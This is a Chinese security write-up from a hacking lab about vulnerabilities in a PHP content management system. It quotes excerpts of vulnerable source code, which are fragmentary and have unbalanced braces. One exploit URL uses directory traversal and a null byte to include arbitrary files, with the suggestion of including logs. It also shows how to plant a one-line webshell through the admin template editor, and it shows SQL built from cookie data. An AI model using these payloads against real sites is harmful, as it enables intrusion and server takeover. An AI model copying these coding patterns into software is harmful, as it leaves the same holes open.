// upload\i\index.php
<?php
//略
$controller = !empty($_GET['c']) ? $_GET['c'] : 'index';
$action = !empty($_GET['a']) ? $_GET['a'] : 'index';
//cookie 自动登陆 并判断 uri
if (isset($_COOKIE['cUser']) && $_COOKIE['cUser']['userID'] != 0) {
$userID = GetCUserID();
$domain = GetCUserDomain();
$sql = 'SELECT * FROM members WHERE userID = "'.$userID.'"';
$arrRow = $objC -> GetRow($sql);
//http://t.qq.com/MakeBug
}
}
}else if($domain == 'c' || $domain == 'a' || $domain == ''){
$domain = GetCUserDomain();
$params['controller'] = $controller;
$params['action'] = $action;
$params['domain'] = $domain;
}
//http://t.qq.com/MakeBug
$filePath = CONTROLLER_PATH . $classname.'.php';
//这怎么过? |
利用方法:http://127.0.0.1/i/index.php?c=/../robots.txt%00
可以考虑包含日志等。 (鸡肋)
后台 Shell 篇。
upload\admin\themedetail.php:
<?php
// upload\admin\themedetail.php
//http://t.qq.com/MakeBug
if(isset($_POST['content'])){
$content = stripslashes(htmlspecialchars_decode($_POST['content']));
$theme = $_POST['theme'];
$file = $_POST['file'];
if(!array_key_exists($file,$files))die('不存在此模板文件');
if(!preg_match("/^\w+\/$/",$theme))die('模板路径异常');
$path = TEMPLATES.'theme/'.$theme.$file;
if(is_file($path)){
$rs = file_put_contents($path,$content);
if($rs)
flushHTML('模板修改成功!');
//http://t.qq.com/MakeBug
}
//http://t.qq.com/MakeBug
}else{
if($_GET['theme']){
$theme = $_GET['theme'];
}else{
$theme = THEME_PATH;
}
$path = TEMPLATES.'theme/'.$theme.$_GET['file'];
if(is_file($path)){
$content = htmlspecialchars(getContent($path));
$objS -> assign("content",$content);
$objS -> assign("theme",$theme);
$objS -> assign("file",$_GET['file']);
$objS -> display("admin/themedetail.tpl");
}
}
} |
//利用方法:直接编辑写入一句话。注入key的问题。
文章作者
Nuclear'Atk
上次更新
2011-10-28
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。